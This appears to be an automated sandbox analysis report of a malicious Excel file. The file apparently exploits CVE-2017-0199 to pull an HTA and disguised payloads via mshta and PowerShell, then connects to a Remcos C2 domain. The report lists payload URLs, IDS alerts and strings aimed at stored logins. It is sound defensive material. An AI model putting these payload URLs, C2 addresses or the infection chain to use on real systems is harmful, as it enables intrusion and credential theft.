                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49167

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49166 -> 185.235.137.223:80
                Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 185.235.137.223:80
                Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 185.235.137.223:80 -> 192.168.2.22:49166
                Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 185.235.137.223:80 -> 192.168.2.22:49164
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49171 -> 192.3.101.29:14645
                Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 185.235.137.223:80 -> 192.168.2.22:49169
                Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 185.235.137.223:80 -> 192.168.2.22:49169
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49170 -> 192.3.101.29:14645
                Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 207.241.227.96:443 -> 192.168.2.22:49168
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: camzeroconnect.duckdns.org
                Uses dynamic DNS services
                Source: unknownDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficHTTP traffic detected: GET /2/items/new_image_20240905/new_image.jpg HTTP/1.1Host: ia601706.us.archive.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /200/NRSCER.txt HTTP/1.1Host: 185.235.137.223Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 192.3.101.29 192.3.101.29
                Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                Source: Joe Sandbox ViewASN Name: INTERNET-ARCHIVEUS INTERNET-ARCHIVEUS
                Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                Source: Joe Sandbox ViewASN Name: AFRARASAIR AFRARASAIR
                Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.22:49172 -> 178.237.33.50:80
                Source: global trafficHTTP traffic detected: GET /yDfvh HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: zeep.lyConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /yDfvh HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: zeep.lyConnection: Keep-AliveCookie: short_478567=1
                Source: global trafficHTTP traffic detected: GET /xampp/ceo/IEnetcateudpationprocess.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.235.137.223Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xampp/ceo/IEnetcateudpationprocess.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.235.137.223Connection: Keep-AliveRange: bytes=8896-If-Range: "24cb3-621aa877cb395"
                Source: global trafficHTTP traffic detected: GET /200/pictureupdatedwithnewquality.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.235.137.223Connection: Keep-Alive
                Source: unknownHTTPS traffic detected: 207.241.227.96:443 -> 192.168.2.22:49168 version: TLS 1.0
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE898B7018 URLDownloadToFileW,7_2_000007FE898B7018
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A84408C8.emfJump to behavior
                Source: global trafficHTTP traffic detected: GET /yDfvh HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: zeep.lyConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /yDfvh HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: zeep.lyConnection: Keep-AliveCookie: short_478567=1
                Source: global trafficHTTP traffic detected: GET /2/items/new_image_20240905/new_image.jpg HTTP/1.1Host: ia601706.us.archive.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xampp/ceo/IEnetcateudpationprocess.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.235.137.223Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xampp/ceo/IEnetcateudpationprocess.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.235.137.223Connection: Keep-AliveRange: bytes=8896-If-Range: "24cb3-621aa877cb395"
                Source: global trafficHTTP traffic detected: GET /200/pictureupdatedwithnewquality.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.235.137.223Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /200/NRSCER.txt HTTP/1.1Host: 185.235.137.223Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: bhv1E0C.tmp.21.drString found in binary or memory: Cookie:user@www.linkedin.com/ equals www.linkedin.com (Linkedin)
                Source: RegAsm.exe, 0000001A.00000002.511886062.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                Source: RegAsm.exe, RegAsm.exe, 0000001A.00000002.511886062.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                Source: RegAsm.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                Source: bhv1E0C.tmp.21.drString found in binary or memory: www.linkedin.come equals www.linkedin.com (Linkedin)
                Source: mshta.exe, 00000004.00000003.474232984.000000000370D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476741693.0000000003710000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474811501.000000000370F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                Source: RegAsm.exe, 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                Source: RegAsm.exe, 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: zeep.ly
                Source: global trafficDNS traffic detected: DNS query: ia601706.us.archive.org
                Source: global trafficDNS traffic detected: DNS query: camzeroconnect.duckdns.org
                Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                Source: powershell.exe, 0000000E.00000002.505047293.0000000003277000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.223
                Source: mshta.exe, 00000004.00000003.474232984.0000000003752000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.475368209.0000000003752000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474811501.0000000003752000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476741693.0000000003752000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.223/
                Source: powershell.exe, 0000000E.00000002.505047293.0000000003277000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.505047293.0000000002785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.223/200/NRSCER.txt
                Source: powershell.exe, 0000000E.00000002.505047293.0000000003277000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.223/200/Nh
                Source: powershell.exe, 00000007.00000002.490691993.0000000002730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.223/200/pictu
                Source: powershell.exe, 00000007.00000002.490691993.0000000002730000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.496333686.000000001C1A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.495961641.000000001A550000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.223/200/pictureupdatedwithnewquality.tIF
                Source: powershell.exe, 00000007.00000002.490691993.0000000002730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.223/200/pictureupdatedwithnewquality.tIFp
                Source: mshta.exe, 00000004.00000003.474574663.0000000000503000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.223/xampp/ceo/IEnetcateudpationprocess.hta
                Source: mshta.exe, 00000004.00000003.475715183.0000000000503000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476106334.0000000000503000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474272874.0000000000503000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474574663.0000000000503000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.223/xampp/ceo/IEnetcateudpationprocess.hta...
                Source: mshta.exe, 00000004.00000003.475715183.0000000000503000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476106334.0000000000503000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474272874.0000000000503000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474574663.0000000000503000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.223/xampp/ceo/IEnetcateudpationprocess.hta4
                Source: mshta.exe, 00000004.00000002.476023425.000000000048A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.223/xampp/ceo/IEnetcateudpationprocess.htaC:
                Source: mshta.exe, 00000004.00000003.475198799.0000000002765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.223/xampp/ceo/IEnetcateudpationprocess.htahttp://185.235.137.223/xampp/ceo/IEnetc
                Source: mshta.exe, 00000004.00000002.476023425.000000000048A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.223/xampp/ceo/IEnetcateudpationprocess.htajVpl(
                Source: mshta.exe, 00000004.00000002.476023425.000000000048A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.223/xampp/ceo/IEnetcateudpationprocess.htapVpl(
                Source: mshta.exe, 00000004.00000002.476023425.000000000048A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.223/xampp/ceo/IEnetcateudpationprocess.htasdVpl(C
                Source: powershell.exe, 0000000E.00000002.505047293.0000000002785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.223pB7
                Source: powershell.exe, 0000000E.00000002.505047293.0000000003277000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.235H
                Source: bhv1E0C.tmp.21.drString found in binary or memory: http://acdn.adnxs.com/ast/ast.js
                Source: bhv1E0C.tmp.21.drString found in binary or memory: http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
                Source: bhv1E0C.tmp.21.drString found in binary or memory: http://b.scorecardresearch.com/beacon.js
                Source: bhv1E0C.tmp.21.drString found in binary or memory: http://cache.btrll.com/default/Pix-1x1.gif
                Source: bhv1E0C.tmp.21.drString found in binary or memory: http://cdn.at.atwola.com/_media/uac/msn.html
                Source: bhv1E0C.tmp.21.drString found in binary or memory: http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
                Source: bhv1E0C.tmp.21.drString found in binary or memory: http://cdn.taboola.com/libtrc/msn-home-network/loader.js
                Source: bhv1E0C.tmp.21.drString found in binary or memory: http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
                Source: mshta.exe, 00000004.00000003.474232984.000000000370D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476741693.0000000003710000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474811501.000000000370F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.475368209.000000000370F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.496333686.000000001C21C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521661527.000000001C24B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                Source: mshta.exe, 00000004.00000003.474232984.000000000370D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476741693.0000000003710000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474811501.000000000370F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.475368209.000000000370F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.496333686.000000001C1A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.496333686.000000001C21C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.496333686.000000001C1FD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521661527.000000001C223000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521079738.000000001ABB1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521661527.000000001C237000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
